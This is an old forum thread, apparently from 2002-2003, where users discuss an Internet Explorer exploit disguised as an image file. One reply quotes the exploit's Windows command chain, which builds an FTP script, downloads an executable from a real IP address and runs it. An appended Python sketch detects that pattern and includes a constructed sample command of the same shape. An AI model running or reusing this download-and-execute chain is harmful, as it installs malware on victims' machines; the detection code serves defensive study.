Author Topic: yet another exploit  (Read 1244 times)

anphanax

  • Member
  • **
  • Posts: 197
  • Kudos: 11
    • http://june.tripod.com
yet another exploit
« on: 29 December 2002, 10:04 »
http://unsecured.netfirms.com/exploit.jpg

this doesn't work with Mozilla or Netscape
But it sure as hell does with MSIE

Edit: Isn't it amazing how MSIE will just let you
use any extension for HTML files. I wonder if
this little bug has some My Computer zone
privileges. That would be funny and devastating
if someone played around with VBScript in this
way.

As a side note, similar to MS, of course America
Online has yet another problem, this one
involving punters:
www.xeons.net (sad, but as form of proof)

New Edit:
http://www.zeropaid.com/news/articles/auto/12182002g.php
Apparently Windows users also get to deal with
buffer overflow errors regarding "oversized"
mp3s and wmv files. I noticed their PNG thing
as well, and I have seen how MSIE doesn't always
handle them properly anyways, but THIS IS
PATHETIC.. And now Windows XP users must wait
until MS patches this. (If they haven't already)
Note article dating: December 18, 2002, 5:12 PM PT

[ December 29, 2002: Message edited by: anphanax ]


Calum

  • Global Moderator
  • Member
  • ***
  • Posts: 7,812
  • Kudos: 1000
    • Calum Carlyle's music
yet another exploit
« Reply #1 on: 4 January 2003, 06:44 »
article from pcgames.de

Not quite so bad, just another article about Microsoft's swiss cheese shaped software.

[ January 03, 2003: Message edited by: Calum ]

[ January 04, 2003: Message edited by: Calum ]

visit these websites and make yourself happy forever:
It's my music! | My music on MySpace | Integrational Polytheism

Gooseberry Clock

  • Member
  • **
  • Posts: 419
  • Kudos: 0
    • http://redrangersoftware.cjb.net/
yet another exploit
« Reply #2 on: 4 January 2003, 20:16 »
Let's see how long it takes them to bust this guy.

Calum

yet another exploit
« Reply #3 on: 4 January 2003, 23:09 »
what guy, fuckass?

Gooseberry Clock

yet another exploit
« Reply #4 on: 8 January 2003, 23:20 »
quote:
args = '/c echo o 141.156.185.80> c:/windows/ftp.txt & '+
 'echo user anonymous>> c:/windows/ftp.txt & '+
 'echo anonymous@anonymous>> c:/windows/ftp.txt & '+
 'echo get /fun.exe c:/windows/taskdl.exe>> c:/windows/ftp.txt & '+
 'echo quit>> c:/windows/ftp.txt & '+
 'ftp -i -n -v -s:c:/windows/ftp.txt & '+
 'c:/windows/taskdl.exe';
His IP is clearly visible in the unescaped code.
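
Added example, not part of the original post or thread: a detection sketch for the pattern quoted above, where a command line builds an FTP script with `echo` redirects, runs `ftp -s:` on it, and then executes the downloaded file. The function name, sample paths and the 192.0.2.10 documentation address are constructed for illustration, and percent-encoding stands in for the page's escaped script as an assumption.

```python
import re
from urllib.parse import quote, unquote

# "echo <text> > file" or ">> file": pieces that build a script line by line
ECHO_REDIRECT = re.compile(r'\becho\s+(.*?)\s*>{1,2}\s*([^\s&|>]+)', re.I)
# ftp invoked with -s:<scriptfile>, inside one "&"-separated command
FTP_SCRIPT_RUN = re.compile(r'\bftp(?:\.exe)?\b[^&|]*?\s-s:(\S+)', re.I)

def analyze(cmdline):
    """Report what an echo-built 'ftp -s:' script fetches and whether it is then run."""
    text = unquote(cmdline)  # decodes %XX escapes only, not JavaScript %uXXXX
    built = {}               # script path -> list of tokenised script lines
    for content, path in ECHO_REDIRECT.findall(text):
        built.setdefault(path.lower(), []).append(content.split())
    result = {"ftp_script": None, "host": None,
              "downloads": [], "executes_download": False}
    run = FTP_SCRIPT_RUN.search(text)
    if not run:
        return result
    result["ftp_script"] = run.group(1).lower()
    for parts in built.get(result["ftp_script"], []):
        if not parts:
            continue
        verb = parts[0].lower()
        if verb in ("o", "open") and len(parts) > 1:
            result["host"] = parts[1]                      # server the script connects to
        elif verb == "get" and len(parts) > 2:
            result["downloads"].append(parts[2].lower())   # local destination path
    # Anything fetched by the script and named again after the ftp call is executed.
    tail = text[run.end():].lower()
    result["executes_download"] = any(d in tail for d in result["downloads"])
    return result

# Constructed sample (placeholder host and file names), percent-encoded
SAMPLE = quote(
    "/c echo o 192.0.2.10> c:/windows/ftp.txt & "
    "echo user anonymous>> c:/windows/ftp.txt & "
    "echo get /payload.bin c:/windows/dropped.exe>> c:/windows/ftp.txt & "
    "echo quit>> c:/windows/ftp.txt & "
    "ftp -i -n -v -s:c:/windows/ftp.txt & c:/windows/dropped.exe")

if __name__ == "__main__":
    print(analyze(SAMPLE))
```
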

Calum

yet another exploit
« Reply #5 on: 9 January 2003, 14:20 »
oh okay, didn't realise who you were talking about...